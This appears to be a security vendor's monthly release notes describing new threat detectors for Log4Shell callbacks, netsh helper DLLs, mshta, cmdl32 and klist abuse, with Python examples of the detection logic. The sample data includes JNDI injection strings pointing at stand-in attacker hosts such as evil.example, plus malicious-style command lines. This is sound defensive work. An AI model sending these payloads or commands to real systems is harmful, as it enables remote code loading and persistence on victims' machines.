This page contains information about new content released in the last month, and improvements and bug fixes to existing content.
This information, and information about all existing content, can also be found in the Knowledge Center in the Hunters portal.

Each entry below gives the item's category (Detector, Drilldown or Dataflow), its name, a description, its prerequisites (the log sources it needs) and where it can be found in the portal.

Detector: Suspected Log4Shell Exploitation - EDR

Description: Detects a Log4Shell (CVE-2021-44228) exploitation attempt, i.e. a JNDI lookup string in a web request, followed by an outgoing connection from the targeted host to the attacker's domain or IP named in that JNDI lookup string, as observed in EDR logs.

Prerequisites:
  • EDR logs
  • Web requests logs

Where it can be found: Leads page - Enterprise Network leads.

Detector: Suspected Log4Shell Exploitation - Network Traffic

Description: Detects a Log4Shell (CVE-2021-44228) exploitation attempt, i.e. a JNDI lookup string in a web request, followed by an outgoing connection from the targeted host to the attacker's IP named in that JNDI lookup string, as observed in network traffic logs rather than EDR events.

Prerequisites:
  • Network traffic logs
  • Web requests logs

Where it can be found: Leads page - Enterprise Network leads.
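
The correlation both Log4Shell detectors perform, as an added example (not Hunters' detector code): the JNDI lookup string is pulled out of a web-request field, de-obfuscated (attackers hide the literal "jndi" with nested lookups such as ${lower:j} or ${::-j} and URL-encoding), and then matched against a later outbound connection from the same host to the callback host and port. The sample events and their flat field layout are constructed for the example; the process field is None for non-EDR network logs, which is the only difference between the EDR and Network Traffic variants here.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample events (not real data). The field layout is an assumption;
# map your own web-request and EDR/network tables onto it.
WEB_REQUESTS = [
    # (timestamp, source IP, targeted host, a logged request field such as User-Agent)
    ("2021-12-11T10:00:01Z", "203.0.113.7", "app01", "${jndi:ldap://198.51.100.23:1389/a}"),
    ("2021-12-11T10:05:00Z", "203.0.113.9", "app01",
     "${${lower:j}ndi:${::-r}mi://evil.example/x}"),   # obfuscated, default RMI port
    ("2021-12-11T10:10:00Z", "198.51.100.5", "app02", "Mozilla/5.0"),
]
CONNECTIONS = [
    # (timestamp, host, process or None for non-EDR network logs, dst IP, dst domain or None, dst port)
    ("2021-12-11T10:00:03Z", "app01", "java", "198.51.100.23", None, 1389),
    ("2021-12-11T10:07:00Z", "app01", None, "192.0.2.44", "evil.example", 1099),
    ("2021-12-11T10:20:00Z", "app02", "curl", "93.184.216.34", None, 443),
]

# Nested lookups used to hide the literal "jndi": ${lower:j}, ${upper:J}, ${::-j}, ${env:X:-j}
NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]+)\}|\$\{[^${}]*:-([^${}]*)\}", re.I)
JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns)://([^/:}\s]+)(?::(\d+))?", re.I)
DEFAULT_PORT = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}

def normalize(value):
    """URL-decode and collapse nested lookups until the string stops changing."""
    s = unquote(value)
    prev = None
    while prev != s:
        prev = s
        s = NESTED.sub(lambda m: (m.group(1) or m.group(2) or "").lower(), s)
    return s

def extract_jndi_targets(value):
    """Return (scheme, host, port) for every JNDI lookup found in a request field."""
    out = []
    for scheme, host, port in JNDI.findall(normalize(value)):
        scheme = scheme.lower()
        out.append((scheme, host.lower(), int(port) if port else DEFAULT_PORT[scheme]))
    return out

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def correlate(web_requests, connections, window=timedelta(minutes=10)):
    """Pair each JNDI lookup with a later outbound connection from the targeted host
    to the callback host (matched by IP or resolved domain) on the callback port."""
    leads = []
    for w_ts, src_ip, target_host, field in web_requests:
        for scheme, cb_host, cb_port in extract_jndi_targets(field):
            for c_ts, host, proc, dst_ip, dst_domain, dst_port in connections:
                delay = (_ts(c_ts) - _ts(w_ts)).total_seconds()
                if host != target_host or not 0 <= delay <= window.total_seconds():
                    continue
                if cb_host in (dst_ip, (dst_domain or "").lower()) and dst_port == cb_port:
                    leads.append({"host": host, "attacker_src": src_ip, "scheme": scheme,
                                  "callback": f"{cb_host}:{cb_port}", "process": proc,
                                  "lookup_ts": w_ts, "connection_ts": c_ts})
    return leads

if __name__ == "__main__":
    for lead in correlate(WEB_REQUESTS, CONNECTIONS):
        print(lead)
```

The window is deliberately short: the JNDI fetch happens while the vulnerable request is being logged, so a connection minutes later to the same host is far more likely a second stage than a coincidence. Resolving the callback domain through DNS events rather than relying on a resolved-domain field in the connection log is the usual production refinement.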

Detector: Rare LDAP or RMI Connection to External Server

Description: Detects LDAP, LDAPS or RMI connections to a rarely seen external IP address. This behavior can indicate exploitation of CVE-2021-44228 ("Log4Shell"), in which the vulnerable application fetches the attacker's payload over LDAP or RMI.

Prerequisites:
  • Network traffic logs

Where it can be found: Leads page - Enterprise Network leads.

Detector: LDAP or RMI Connection to External Server by Java Process

Description: Detects connections from a Java process to LDAP, LDAPS or RMI ports on an external IP address. This behavior can indicate exploitation of CVE-2021-44228 ("Log4Shell"), since the JNDI lookup is performed by the Java process hosting the vulnerable Log4j library.

Prerequisites:
  • EDR logs

Where it can be found: Leads page - Enterprise Network leads.
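
The two behavioral detectors above, as an added example (not Hunters' detector code): the first needs only a connection log plus a baseline of how often each external LDAP/RMI destination has been seen before, the second needs the EDR process name and no baseline at all. The sample events, the flat field layout and the "seen on fewer than three distinct days" rarity threshold are all assumptions made for the example; the port list is the page's, and since attacker listeners often use arbitrary ports it should be treated as a floor rather than a complete set.

```python
import ipaddress
from collections import defaultdict

LDAP_RMI_PORTS = {389, 636, 1099}        # LDAP, LDAPS, RMI registry
JAVA_IMAGES = {"java", "java.exe", "javaw.exe"}

# Explicit internal ranges rather than ipaddress.is_private: Python also treats the
# RFC 5737 documentation ranges used in this sample (198.51.100/24, 203.0.113/24) as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
    "fc00::/7", "fe80::/10", "::1/128")]

def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

# Constructed sample connection events (not real data). Field layout is an assumption:
# (timestamp, host, process image or None for non-EDR network logs, dst IP, dst port)
BASELINE = [  # 30 days of history: a cloud LDAPS directory that a file server talks to daily
    (f"2021-11-{d:02d}T09:00:00Z", "fs02", "svchost.exe", "198.51.100.10", 636) for d in range(1, 31)
] + [("2021-11-15T12:00:00Z", "app01", "java", "203.0.113.50", 389)]   # seen once, weeks ago
RECENT = [
    ("2021-12-11T10:00:03Z", "app01", "java", "203.0.113.50", 389),         # Java -> external LDAP
    ("2021-12-11T10:01:00Z", "fs02", "svchost.exe", "198.51.100.10", 636),  # routine, well known
    ("2021-12-11T10:02:00Z", "app03", "java", "10.0.0.5", 389),             # internal AD, expected
    ("2021-12-11T10:03:00Z", "web01", None, "192.0.2.9", 1099),             # network log only
]

def build_baseline(events):
    """Number of distinct days on which each external LDAP/RMI destination was seen."""
    days = defaultdict(set)
    for ts, host, proc, dst_ip, port in events:
        if port in LDAP_RMI_PORTS and is_external(dst_ip):
            days[dst_ip].add(ts[:10])
    return {ip: len(d) for ip, d in days.items()}

def rare_external_ldap_rmi(events, baseline_days, min_days=3):
    """'Rare LDAP or RMI Connection to External Server': any log source, rarity from the baseline."""
    return [e for e in events
            if e[4] in LDAP_RMI_PORTS and is_external(e[3]) and baseline_days.get(e[3], 0) < min_days]

def java_external_ldap_rmi(events):
    """'LDAP or RMI Connection to External Server by Java Process': EDR only, no baseline needed."""
    return [e for e in events
            if e[2] and e[2].lower() in JAVA_IMAGES and e[4] in LDAP_RMI_PORTS and is_external(e[3])]

if __name__ == "__main__":
    baseline = build_baseline(BASELINE)
    print("rare:", rare_external_ldap_rmi(RECENT, baseline))
    print("java:", java_external_ldap_rmi(RECENT))
```

In the sample, app01's connection fires both detectors (external, rarely seen, and from a Java process), web01's fires only the rarity detector because a network log carries no process name, and fs02's daily LDAPS traffic is suppressed by the baseline.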

Drilldown: Email Address Statistics

Description: Statistics for the email address, including the number of emails sent and received and the prevalence of the sender over time.

Prerequisites:
  • Raw Email logs

Where it can be found: Under the Employee entity, when an email address is found. For Email detectors, under the Mailbox entity.

Drilldown: Last Emails Sent

Description: The last emails sent by the email address. The search currently covers one day back.

Prerequisites:
  • Raw Email logs

Where it can be found: In Email detectors, under the Sender Mailbox entity.

Drilldown: Last Okta Sessions for Email

Description: Okta user sessions matching a given email address (which correlates to an Okta user). Each session includes its start and end times, the number of events in the session, and the IPs and User-Agents used during it. The search currently covers Okta sessions from the last 7 days.

Prerequisites:
  • Okta logs

Where it can be found: Under the Employee entity, when an email address is found. For Okta detectors, under the Okta User entity.
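
How the per-session summary in this drilldown can be built from raw Okta System Log events, as an added example (not Hunters' drilldown code): filter to the user's events inside the 7-day window, group them by Okta's external session id, and report start, end, event count, IPs and User-Agents per session. The events and the flattened field names are constructed for the example and stand in for the real System Log fields named in the comment; the "mixed_clients" flag is an addition that the drilldown's output makes easy to compute.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Okta System Log-like events (not real data). The flat keys used here
# (published, actor, session, ip, ua, type) are an assumption standing in for
# published, actor.alternateId, authenticationContext.externalSessionId,
# client.ipAddress, client.userAgent.rawUserAgent and eventType.
EVENTS = [
    {"published": "2021-12-20T08:00:00Z", "actor": "alice@example.com", "session": "sess-1",
     "ip": "198.51.100.20", "ua": "Mozilla/5.0 (Windows NT 10.0)", "type": "user.session.start"},
    {"published": "2021-12-20T08:05:00Z", "actor": "alice@example.com", "session": "sess-1",
     "ip": "198.51.100.20", "ua": "Mozilla/5.0 (Windows NT 10.0)", "type": "user.authentication.sso"},
    # Same session id, but a new source IP and a scripted User-Agent: worth a second look
    {"published": "2021-12-20T08:40:00Z", "actor": "alice@example.com", "session": "sess-1",
     "ip": "203.0.113.77", "ua": "python-requests/2.26.0", "type": "user.authentication.sso"},
    {"published": "2021-12-21T09:00:00Z", "actor": "Alice@example.com", "session": "sess-2",
     "ip": "198.51.100.20", "ua": "Mozilla/5.0 (Windows NT 10.0)", "type": "user.session.start"},
    # Older than the 7-day window
    {"published": "2021-12-01T09:00:00Z", "actor": "alice@example.com", "session": "sess-0",
     "ip": "198.51.100.20", "ua": "Mozilla/5.0 (Windows NT 10.0)", "type": "user.session.start"},
    # Different user
    {"published": "2021-12-21T09:10:00Z", "actor": "bob@example.com", "session": "sess-3",
     "ip": "198.51.100.21", "ua": "Mozilla/5.0 (Macintosh)", "type": "user.session.start"},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def okta_sessions(events, email, now, days=7):
    """Group a user's Okta events by external session id within the lookback window
    and summarise each session: start, end, event count, IPs and User-Agents.
    Sessions are returned newest first."""
    cutoff = now - timedelta(days=days)
    by_session = defaultdict(list)
    for ev in events:
        if ev["actor"].lower() == email.lower() and _ts(ev["published"]) >= cutoff:
            by_session[ev["session"]].append(ev)
    sessions = []
    for sid, evs in by_session.items():
        evs.sort(key=lambda e: e["published"])
        ips = sorted({e["ip"] for e in evs})
        uas = sorted({e["ua"] for e in evs})
        sessions.append({
            "session_id": sid,
            "start": evs[0]["published"],
            "end": evs[-1]["published"],
            "events": len(evs),
            "ips": ips,
            "user_agents": uas,
            # More than one IP or User-Agent inside a single session can indicate the
            # session token being reused from another machine, so flag it for the analyst.
            "mixed_clients": len(ips) > 1 or len(uas) > 1,
        })
    sessions.sort(key=lambda s: s["start"], reverse=True)
    return sessions

if __name__ == "__main__":
    for s in okta_sessions(EVENTS, "alice@example.com", now=_ts("2021-12-22T00:00:00Z")):
        print(s)
```

Matching the email case-insensitively matters because Okta's actor.alternateId preserves whatever case the identity source supplied, while the email address extracted from another log often does not.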

Detector: Netsh Helper DLL Added

Description: Detects executions of the "netsh add helper" command, which registers a DLL that netsh loads on every subsequent run. Threat actors use this to establish persistence on a victim's machine.

https://attack.mitre.org/techniques/T1546/007/

Prerequisites:
  • EDR logs

Where it can be found: Leads page - Enterprise Network leads.

Detector: Malicious Cmdl32 Execution

Description: Detects execution of cmdl32.exe, a signed system binary belonging to Microsoft Connection Manager Auto-Download. Threat actors may abuse it to download payloads through a trusted binary and evade detection.

https://attack.mitre.org/techniques/T1105/

Prerequisites:
  • EDR logs

Where it can be found: Leads page - Enterprise Network leads. SOC Queue - for leads scored 80 and above.

Detector: Suspicious .hta File Execution

Description: Mshta.exe is a Windows utility for executing Microsoft HTML Application (HTA) files; it can also run JavaScript and VBScript passed directly on the command line. Threat actors commonly use it at various stages of an attack to proxy the execution of arbitrary code through a trusted, signed utility.

https://attack.mitre.org/techniques/T1218/005/

Prerequisites:
  • EDR logs

Where it can be found: Leads page - Enterprise Network leads.

Detector: Kerberos Tickets Discovery Using klist.exe

Description: Detects klist.exe execution (the 'purge' argument is excluded). Threat actors often run klist.exe to enumerate cached Kerberos tickets before credential attacks such as Kerberoasting, pass-the-ticket or DCSync.

https://attack.mitre.org/techniques/T1558/

Prerequisites:
  • EDR logs

Where it can be found: Leads page - Enterprise Network leads.
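
The four EDR command-line detectors above (netsh helper, cmdl32, mshta and klist) share one shape: split the process command line the way Windows does, normalise the image name, and apply a per-detector predicate. As an added example (not Hunters' detector code), the block below runs such rules over constructed sample command lines and also pulls absolute file paths out of the arguments, which is the kind of File entity that the improvements list says EDR leads now extract. The rules, the file-path pattern and the sample command lines are assumptions made for the example.

```python
import re
from os.path import basename

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_COMMANDLINES = [
    r'netsh.exe add helper C:\Users\Public\nethelper.dll',
    r'netsh.exe interface show interface',
    r'C:\Windows\System32\cmdl32.exe /vpn /lan C:\ProgramData\profile.inf',
    r'mshta.exe "C:\Users\bob\AppData\Local\Temp\update.hta"',
    r"mshta.exe javascript:eval(\"new ActiveXObject('WScript.Shell').Run('calc.exe')\")",
    r'klist.exe purge',
    r'klist -li 0x3e7',
]

TOKEN = re.compile(r'"[^"]*"|\S+')
FILE_TOKEN = re.compile(r'^[a-z]:\\.+\.[a-z0-9]{1,4}$', re.I)   # drive-letter path with an extension

def split_commandline(cmd):
    """Windows-style split: keep quoted arguments whole, drop the surrounding quotes."""
    return [t.strip('"') for t in TOKEN.findall(cmd)]

def image_name(argv0):
    """Lower-cased image name without directory or .exe suffix ('klist', 'mshta', ...)."""
    return re.sub(r"\.exe$", "", basename(argv0.replace("\\", "/")).lower())

def file_entities(args):
    """Absolute paths found in the arguments, the raw material for a File entity."""
    return [a for a in args if FILE_TOKEN.match(a)]

# (detector name, ATT&CK technique, predicate over (image name, lower-cased arguments))
RULES = [
    ("Netsh Helper DLL Added", "T1546.007",
     lambda img, args: img == "netsh" and "add" in args and "helper" in args),
    ("Malicious Cmdl32 Execution", "T1105",
     lambda img, args: img == "cmdl32"),
    ("Suspicious .hta File Execution", "T1218.005",
     lambda img, args: img == "mshta" and any(
         a.endswith(".hta") or a.startswith(("javascript:", "vbscript:")) for a in args)),
    ("Kerberos Tickets Discovery Using klist.exe", "T1558",
     lambda img, args: img == "klist" and "purge" not in args),
]

def detect(cmd):
    """Return (detector, technique, file entities) for every rule the command line matches."""
    argv = split_commandline(cmd)
    if not argv:
        return []
    img = image_name(argv[0])
    args = [a.lower() for a in argv[1:]]
    return [(name, tech, file_entities(argv[1:])) for name, tech, pred in RULES if pred(img, args)]

def detect_all(cmds):
    return {cmd: detect(cmd) for cmd in cmds}

if __name__ == "__main__":
    for cmd, hits in detect_all(SAMPLE_COMMANDLINES).items():
        print(cmd, "->", hits or "no hit")
```

Stripping the directory and .exe suffix before matching is what keeps a bare `klist` and a full `C:\Windows\System32\cmdl32.exe` on the same rule; matching on the lower-cased argument list rather than a substring of the whole line is what keeps `netsh interface show` from being confused with `netsh add helper`.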

Drilldown: EDR File Path Info

Description: Returns all details of a specific file on a specific EDR agent, together with all activity performed on it, such as the processes that created or modified it.

Prerequisites:
  • EDR logs

Where it can be found: Under the File entity, in every lead that has such an entity.

Dataflow: CrowdStrike Devices

Description: A new integration based on the CrowdStrike Host Management API. It lets Hunters ingest and use all data about CrowdStrike agents, such as hostnames, network details and OS details. To enable it, upgrade the Hunters SOC app in the CrowdStrike store.

Where it can be found: As a new table in your Snowflake database. The data is also used in various correlation features in the product.

Improvements and Bug Fixes

  • Hunters now receives all raw events from CrowdStrike agents using the CrowdStrike store integration, instead of the limited list received until now. To enable this, please upgrade the Hunters SOC app in the CrowdStrike store.

  • The Drilldown “G Suite Activity Statistics” will now appear under the “Employee” Entity for G Suite detectors.

  • The “Host Owner” entity will now appear for all EDR leads, when a primary user was found for the relevant host.

  • A “File” entity will now be extracted from the process commandline and appear in EDR detectors such as “Suspicious .hta File Execution”, “Suspicious Execution from %ProgramData%” and more.

  • Improved the regex and conditions of the “Use of Kali Linux” detector.

  • Improved the allow list of the “PowerShell Outgoing Connection with New Commandline” detector: removed internal IPv6 addresses and common known domains.

  • Added support for entities in Carbon Black alerts when the Carbon Black raw data does not exist.

  • Improved conditions for the detector “CloudTrail Logging Disruption”.